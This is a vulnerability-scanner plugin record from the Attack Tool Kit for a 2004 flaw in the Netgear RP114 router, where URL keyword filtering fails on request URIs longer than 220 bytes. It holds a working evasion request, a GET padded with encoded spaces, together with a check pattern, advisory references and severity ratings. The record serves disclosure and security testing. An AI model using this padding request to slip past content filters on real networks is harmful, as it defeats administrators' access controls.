Netgear RP114 URL filtering long request evasion 2.0
 
Plugin ID135
Plugin nameNetgear RP114 URL filtering long request evasion
Plugin filenameNetgear RP114 URL filtering long request evasion.plugin
Plugin filesize4695 bytes
Plugin familyFirewalls
Plugin created nameMarc Ruef
Plugin created emailmarc dot ruef at computec dot ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2004/09/02
Plugin updated nameMarc Ruef
Plugin updated emailmarc dot ruef at computec dot ch
Plugin updated webhttp://www.computec.ch
Plugin updated companycomputec.ch
Plugin updated date2004/11/14
Plugin version2.0
Plugin changelogAdded SecurityTracker ID in version 1.1. Corrected the plugin structure and added the accuracy values in 1.2. Improved the pattern matching and introduced the plugin changelog in 2.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send GET http://www.computec.ch/?%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.1 200 OK*Server: NETGEAR: Content Filter/1.#*Access Denied by NETGEAR*
Plugin exploit accuracy97
Plugin commentThis plugin was written with the ATK Attack Editor.
Bug published nameMarc Ruef
Bug published emailmarc dot ruef at computec dot ch
Bug published webhttp://www.computec.ch
Bug published companycomputec.ch
Bug published date2004/05/24
Bug advisoryhttp://www.scip.ch/cgi-bin/smss/showadvf.pl?id=667
Bug affectedNetgear RP114
Bug not affectedOther solutions
Bug vulnerability classEvasion
Bug descriptionNetgear has some small router and firewalling devices for home users and small companies (SOHO). Most of these solutions are able to do a simple keyword based URL filtering. Lets say we don't want users to visit http://www.computec.ch so we create a filter for the keyword "computec.ch". If a user wants to access a domain that contains the string "computec.ch" (e.g. www.computec.ch or test.computec.ch) he will get a white html document that says "Blocked by NETGEAR". He is not able to see the requested document itself. The Netgear RP114 is not able to do the filtering if the requested URI is more than 220 bytes long. Other Netgear routers and firewalls may also be affected. If you are requesting the following URL, the attacker is able to see the requested web document without restriction. An attacker may be able to evade the URL black list and get access to disallowed ressources. This may be a buffer overflow and it may be possible to run arbitrary code on the Netgear device.
Bug solutionNetgear may provide a new firmware or another workaround. It is suggested to install another URL filtering solution if this functionality is really needed.
Bug fixing timeApprox. 45 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.computec.ch/projekte/atk/
Bug remoteNo
Bug localNo
Bug severityMedium
Bug popularity6
Bug simplicity8
Bug impact7
Bug risk6
Bug check toolsThe ATK is able to exploit this vulnerability. Under some circumstances the WinAmp player is exploiting this vulnerability when fetching data from the Internet about a playing track. See also http://seclists.org/lists/bugtraq/2004/May/0263.html for more details.
Source SecurityFocus BID10404
Source Secunia ID11698
Source SecuriTeam URLhttp://www.securiteam.com/securitynews/5VP0P15CUK.html
Source Security Tracker ID1010263
Source scipID667
Source LiteratureHacking Intern - Angriffe, Strategien, Abwehr, Marc Ruef, Marko Rogge, Uwe Velten and Wolfram Gieseke, November 1, 2002, Data Becker, Düsseldorf, ISBN 381582284X
Source Misc.http://www.securiteam.com/securitynews/5HP01208AQ.html

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.